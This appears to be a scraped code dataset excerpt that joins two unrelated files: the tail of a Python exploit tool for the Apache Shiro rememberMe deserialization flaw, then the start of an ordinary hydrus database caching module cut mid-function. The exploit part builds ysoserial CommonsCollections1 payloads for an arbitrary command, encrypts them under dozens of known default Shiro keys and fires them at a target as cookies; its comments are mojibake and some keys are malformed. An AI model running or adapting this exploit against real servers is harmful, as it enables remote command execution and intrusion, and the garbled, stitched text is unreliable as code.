print("[+] ็ถๆ็ :"+str(r100.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key10:fCq+/xW488hMTCD+cmJ3aQ== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r100.status_code))
payload111 = self.generator111(command, JAR_FILE) # ็ๆpayload111
r111 = requests.get(target, cookies={'rememberMe': payload111.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ111
if(r111.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key11:1QWLxg+NYmxraMoxAXu/Iw== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r111.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key11:1QWLxg+NYmxraMoxAXu/Iw== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r111.status_code))
payload222 = self.generator222(command, JAR_FILE) # ็ๆpayload222
r222 = requests.get(target, cookies={'rememberMe': payload222.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ222
if(r222.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key12:ZUdsaGJuSmxibVI2ZHc9PQ== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r222.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key12:ZUdsaGJuSmxibVI2ZHc9PQ== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r222.status_code))
payload333 = self.generator333(command, JAR_FILE) # ็ๆpayload333
r333 = requests.get(target, cookies={'rememberMe': payload333.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ333
if(r333.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key13:L7RioUULEFhRyxM7a2R/Yg== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r333.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key13:L7RioUULEFhRyxM7a2R/Yg== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r333.status_code))
payload444 = self.generator444(command, JAR_FILE) # ็ๆpayload444
r444 = requests.get(target, cookies={'rememberMe': payload444.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ444
if(r444.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key14:r0e3c16IdVkouZgk1TKVMg== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r444.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key14:r0e3c16IdVkouZgk1TKVMg== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r444.status_code))
payload666 = self.generator666(command, JAR_FILE) # ็ๆpayload666
r666 = requests.get(target, cookies={'rememberMe': payload666.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ666
if(r666.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key15:5aaC5qKm5oqA5pyvAAAAAA== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r666.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key15:5aaC5qKm5oqA5pyvAAAAAA== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r666.status_code))
payload777 = self.generator777(command, JAR_FILE) # ็ๆpayload777
r777 = requests.get(target, cookies={'rememberMe': payload777.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ777
if(r777.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key16:bWluZS1hc3NldC1rZXk6QQ== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r777.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key16:bWluZS1hc3NldC1rZXk6QQ== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r777.status_code))
payload888 = self.generator888(command, JAR_FILE) # ็ๆpayload888
r888 = requests.get(target, cookies={'rememberMe': payload888.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ888
if(r888.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key17:a2VlcE9uR29pbmdBbmRGaQ== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r888.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key17:a2VlcE9uR29pbmdBbmRGaQ== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r888.status_code))
payload999 = self.generator999(command, JAR_FILE) # ็ๆpayload999
r999 = requests.get(target, cookies={'rememberMe': payload999.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ999
if(r999.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key18:WcfHGU25gNnTxTlmJMeSpw== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r999.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key18:WcfHGU25gNnTxTlmJMeSpw== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r999.status_code))
payload_001 = self.generator_001(command, JAR_FILE) # ็ๆpayload555
r_001 = requests.get(target, cookies={'rememberMe': payload_001.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ001
if(r_001.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key19:bWljcm9zAAAAAAAAAAAAAA== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r_001.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key19:bWljcm9zAAAAAAAAAAAAAA== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r_001.status_code))
payload_002 = self.generator_002(command, JAR_FILE) # ็ๆpayload1111
r_002 = requests.get(target, cookies={'rememberMe': payload_002.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ002
if(r_002.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key20:MTIzNDU2Nzg5MGFiY2RlZg== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r_002.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key20:MTIzNDU2Nzg5MGFiY2RlZg== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r_002.status_code))
payload_003 = self.generator_003(command, JAR_FILE) # ็ๆpayload1111
r_003 = requests.get(target, cookies={'rememberMe': payload_003.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ002
if(r_003.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key21:5AvVhmFLUs0KTA3Kprsdag== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r_003.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key21:5AvVhmFLUs0KTA3Kprsdag== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r_003.status_code))
#ๅ่กฅ็ผ็
except Exception as e:
print(e)
return False
def generator(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "kPH+bIxk5D2deZiIxcaaaA==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv) #ๅkeyๅฝฑๅ็encryptor
file_body = pad(popen.stdout.read()) #ๅpopenๅฝฑๅ็file_body
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator2(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "wGiHplamyXlVB11UXWol8g==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator3(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "2AvVhdsgUs0FSA3SDFAdag==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator4(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "4AvVhmFLUs0KTA3Kprsdag==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator5(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "3AvVhmFLUs0KTA3Kprsdag==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator6(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "Z3VucwAAAAAAAAAAAAAAAA==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator7(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "U3ByaW5nQmxhZGUAAAAAAA==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator8(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "wGiHplamyXlVB11UXWol8g==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator9(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "6ZmI6I2j5Y+R5aSn5ZOlAA==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
#ๅ็็บฟ
#ๅ่กฅ็ผ็
def generator100(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "fCq+/xW488hMTCD+cmJ3aQ==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator111(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "1QWLxg+NYmxraMoxAXu/Iw==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator222(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "ZUdsaGJuSmxibVI2ZHc9PQ==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator333(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "L7RioUULEFhRyxM7a2R/Yg==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator444(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "r0e3c16IdVkouZgk1TKVMg==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator555(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "ZWvohmPdUsAWT3=KpPqda" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator666(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "5aaC5qKm5oqA5pyvAAAAAA==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator777(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "bWluZS1hc3NldC1rZXk6QQ==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator888(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "a2VlcE9uR29pbmdBbmRGaQ==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator999(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "WcfHGU25gNnTxTlmJMeSpw==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator1111(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "LEGEND-CAMPUS-CIPHERKEY==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv) #ๅkeyๅฝฑๅ็encryptor
file_body = pad(popen.stdout.read()) #ๅpopenๅฝฑๅ็file_body
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator_001(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "bWljcm9zAAAAAAAAAAAAAA==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv) #ๅkeyๅฝฑๅ็encryptor
file_body = pad(popen.stdout.read()) #ๅpopenๅฝฑๅ็file_body
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator_002(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "MTIzNDU2Nzg5MGFiY2RlZg==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv) #ๅkeyๅฝฑๅ็encryptor
file_body = pad(popen.stdout.read()) #ๅpopenๅฝฑๅ็file_body
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator_003(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "5AvVhmFLUs0KTA3Kprsdag==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv) #ๅkeyๅฝฑๅ็encryptor
file_body = pad(popen.stdout.read()) #ๅpopenๅฝฑๅ็file_body
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
| [
"sven@svenbeast.com"
] | sven@svenbeast.com |
e35702ff865d77d881bb1f8c662a0694bcae1d85 | 027bdfb0f5dd6e7fe86189324a2c7ebd3a1ebea9 | /hydrus/client/db/ClientDBMappingsCacheSpecificStorage.py | 83ba6be205cd310a23f5eb700d6bfbe24c4fb7c0 | [
"WTFPL"
] | permissive | pianomanx/hydrus | 5299a1bcc383760b7ed349e047467f6ac8fa6a43 | 368309645f85ecff832c0a968b3492bf582cdad5 | refs/heads/master | 2023-09-02T14:19:42.516186 | 2023-08-30T21:00:53 | 2023-08-30T21:00:53 | 90,190,997 | 0 | 0 | NOASSERTION | 2023-09-14T09:10:58 | 2017-05-03T20:33:50 | Python | UTF-8 | Python | false | false | 29,320 | py | import collections
import itertools
import sqlite3
import typing
from hydrus.core import HydrusConstants as HC
from hydrus.core import HydrusData
from hydrus.core import HydrusDBBase
from hydrus.core import HydrusLists
from hydrus.core import HydrusTime
from hydrus.client.db import ClientDBFilesStorage
from hydrus.client.db import ClientDBMaintenance
from hydrus.client.db import ClientDBMappingsCacheSpecificDisplay
from hydrus.client.db import ClientDBMappingsCounts
from hydrus.client.db import ClientDBMappingsCountsUpdate
from hydrus.client.db import ClientDBMappingsStorage
from hydrus.client.db import ClientDBModule
from hydrus.client.db import ClientDBServices
from hydrus.client.metadata import ClientTags
class FilteredHashesGenerator( object ):
def __init__( self, file_service_ids_to_valid_hash_ids ):
self._file_service_ids_to_valid_hash_ids = file_service_ids_to_valid_hash_ids
def GetHashes( self, file_service_id, hash_ids ):
return self._file_service_ids_to_valid_hash_ids[ file_service_id ].intersection( hash_ids )
def IterateHashes( self, hash_ids ):
for ( file_service_id, valid_hash_ids ) in self._file_service_ids_to_valid_hash_ids.items():
if len( valid_hash_ids ) == 0:
continue
filtered_hash_ids = valid_hash_ids.intersection( hash_ids )
if len( filtered_hash_ids ) == 0:
continue
yield ( file_service_id, filtered_hash_ids )
class FilteredMappingsGenerator( object ):
def __init__( self, file_service_ids_to_valid_hash_ids, mappings_ids ):
self._file_service_ids_to_valid_hash_ids = file_service_ids_to_valid_hash_ids
self._mappings_ids = mappings_ids
def IterateMappings( self, file_service_id ):
valid_hash_ids = self._file_service_ids_to_valid_hash_ids[ file_service_id ]
if len( valid_hash_ids ) > 0:
for ( tag_id, hash_ids ) in self._mappings_ids:
hash_ids = valid_hash_ids.intersection( hash_ids )
if len( hash_ids ) == 0:
continue
yield ( tag_id, hash_ids )
class ClientDBMappingsCacheSpecificStorage( ClientDBModule.ClientDBModule ):
CAN_REPOPULATE_ALL_MISSING_DATA = True
def __init__( self, cursor: sqlite3.Cursor, modules_services: ClientDBServices.ClientDBMasterServices, modules_db_maintenance: ClientDBMaintenance.ClientDBMaintenance, modules_mappings_counts: ClientDBMappingsCounts.ClientDBMappingsCounts, modules_mappings_counts_update: ClientDBMappingsCountsUpdate.ClientDBMappingsCountsUpdate, modules_files_storage: ClientDBFilesStorage.ClientDBFilesStorage, modules_mappings_cache_specific_display: ClientDBMappingsCacheSpecificDisplay.ClientDBMappingsCacheSpecificDisplay ):
self.modules_services = modules_services
self.modules_db_maintenance = modules_db_maintenance
self.modules_mappings_counts = modules_mappings_counts
self.modules_mappings_counts_update = modules_mappings_counts_update
self.modules_files_storage = modules_files_storage
self.modules_mappings_cache_specific_display = modules_mappings_cache_specific_display
self._missing_tag_service_pairs = set()
ClientDBModule.ClientDBModule.__init__( self, 'client specific display mappings cache', cursor )
def _GetServiceIndexGenerationDictSingle( self, file_service_id, tag_service_id ):
( cache_current_mappings_table_name, cache_deleted_mappings_table_name, cache_pending_mappings_table_name ) = ClientDBMappingsStorage.GenerateSpecificMappingsCacheTableNames( file_service_id, tag_service_id )
version = 486 if file_service_id == self.modules_services.combined_local_media_service_id else 400
index_generation_dict = {}
index_generation_dict[ cache_current_mappings_table_name ] = [
( [ 'tag_id', 'hash_id' ], True, version )
]
index_generation_dict[ cache_deleted_mappings_table_name ] = [
( [ 'tag_id', 'hash_id' ], True, version )
]
index_generation_dict[ cache_pending_mappings_table_name ] = [
( [ 'tag_id', 'hash_id' ], True, version )
]
return index_generation_dict
def _GetServiceIndexGenerationDict( self, service_id ) -> dict:
tag_service_id = service_id
index_dict = {}
file_service_ids = list( self.modules_services.GetServiceIds( HC.FILE_SERVICES_WITH_SPECIFIC_MAPPING_CACHES ) )
for file_service_id in file_service_ids:
single_index_dict = self._GetServiceIndexGenerationDictSingle( file_service_id, tag_service_id )
index_dict.update( single_index_dict )
return index_dict
def _GetServiceTableGenerationDictSingle( self, file_service_id, tag_service_id ):
table_dict = {}
( cache_current_mappings_table_name, cache_deleted_mappings_table_name, cache_pending_mappings_table_name ) = ClientDBMappingsStorage.GenerateSpecificMappingsCacheTableNames( file_service_id, tag_service_id )
version = 486 if file_service_id == self.modules_services.combined_local_media_service_id else 400
table_dict[ cache_current_mappings_table_name ] = ( 'CREATE TABLE IF NOT EXISTS {} ( hash_id INTEGER, tag_id INTEGER, PRIMARY KEY ( hash_id, tag_id ) ) WITHOUT ROWID;', version )
table_dict[ cache_deleted_mappings_table_name ] = ( 'CREATE TABLE IF NOT EXISTS {} ( hash_id INTEGER, tag_id INTEGER, PRIMARY KEY ( hash_id, tag_id ) ) WITHOUT ROWID;', version )
table_dict[ cache_pending_mappings_table_name ] = ( 'CREATE TABLE IF NOT EXISTS {} ( hash_id INTEGER, tag_id INTEGER, PRIMARY KEY ( hash_id, tag_id ) ) WITHOUT ROWID;', version )
return table_dict
def _GetServiceTableGenerationDict( self, service_id ) -> dict:
tag_service_id = service_id
table_dict = {}
file_service_ids = list( self.modules_services.GetServiceIds( HC.FILE_SERVICES_WITH_SPECIFIC_MAPPING_CACHES ) )
for file_service_id in file_service_ids:
single_table_dict = self._GetServiceTableGenerationDictSingle( file_service_id, tag_service_id )
table_dict.update( single_table_dict )
return table_dict
def _GetServiceIdsWeGenerateDynamicTablesFor( self ):
return self.modules_services.GetServiceIds( HC.REAL_TAG_SERVICES )
def _RepairRepopulateTables( self, table_names, cursor_transaction_wrapper: HydrusDBBase.DBCursorTransactionWrapper ):
file_service_ids = list( self.modules_services.GetServiceIds( HC.FILE_SERVICES_WITH_SPECIFIC_MAPPING_CACHES ) )
tag_service_ids = list( self.modules_services.GetServiceIds( HC.REAL_TAG_SERVICES ) )
for tag_service_id in tag_service_ids:
for file_service_id in file_service_ids:
table_dict_for_this = self._GetServiceTableGenerationDictSingle( file_service_id, tag_service_id )
table_names_for_this = set( table_dict_for_this.keys() )
if not table_names_for_this.isdisjoint( table_names ):
self._missing_tag_service_pairs.add( ( file_service_id, tag_service_id ) )
def AddFiles( self, file_service_id, tag_service_id, hash_ids, hash_ids_table_name ):
( cache_current_mappings_table_name, cache_deleted_mappings_table_name, cache_pending_mappings_table_name ) = ClientDBMappingsStorage.GenerateSpecificMappingsCacheTableNames( file_service_id, tag_service_id )
( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name ) = ClientDBMappingsStorage.GenerateMappingsTableNames( tag_service_id )
# deleted don't have a/c counts to update, so we can do it all in one go here
self._Execute( 'INSERT OR IGNORE INTO {} ( hash_id, tag_id ) SELECT tag_id, hash_id FROM {} CROSS JOIN {} USING ( hash_id );'.format( cache_deleted_mappings_table_name, hash_ids_table_name, deleted_mappings_table_name ) )
# temp hashes to mappings
current_mapping_ids_raw = self._Execute( 'SELECT tag_id, hash_id FROM {} CROSS JOIN {} USING ( hash_id );'.format( hash_ids_table_name, current_mappings_table_name ) ).fetchall()
current_mapping_ids_dict = HydrusData.BuildKeyToSetDict( current_mapping_ids_raw )
# temp hashes to mappings
pending_mapping_ids_raw = self._Execute( 'SELECT tag_id, hash_id FROM {} CROSS JOIN {} USING ( hash_id );'.format( hash_ids_table_name, pending_mappings_table_name ) ).fetchall()
pending_mapping_ids_dict = HydrusData.BuildKeyToSetDict( pending_mapping_ids_raw )
all_ids_seen = set( current_mapping_ids_dict.keys() )
all_ids_seen.update( pending_mapping_ids_dict.keys() )
counts_cache_changes = []
for tag_id in all_ids_seen:
current_hash_ids = current_mapping_ids_dict[ tag_id ]
current_delta = len( current_hash_ids )
if current_delta > 0:
self._ExecuteMany( 'INSERT OR IGNORE INTO ' + cache_current_mappings_table_name + ' ( hash_id, tag_id ) VALUES ( ?, ? );', ( ( hash_id, tag_id ) for hash_id in current_hash_ids ) )
current_delta = self._GetRowCount()
#
pending_hash_ids = pending_mapping_ids_dict[ tag_id ]
pending_delta = len( pending_hash_ids )
if pending_delta > 0:
self._ExecuteMany( 'INSERT OR IGNORE INTO ' + cache_pending_mappings_table_name + ' ( hash_id, tag_id ) VALUES ( ?, ? );', ( ( hash_id, tag_id ) for hash_id in pending_hash_ids ) )
pending_delta = self._GetRowCount()
#
if current_delta > 0 or pending_delta > 0:
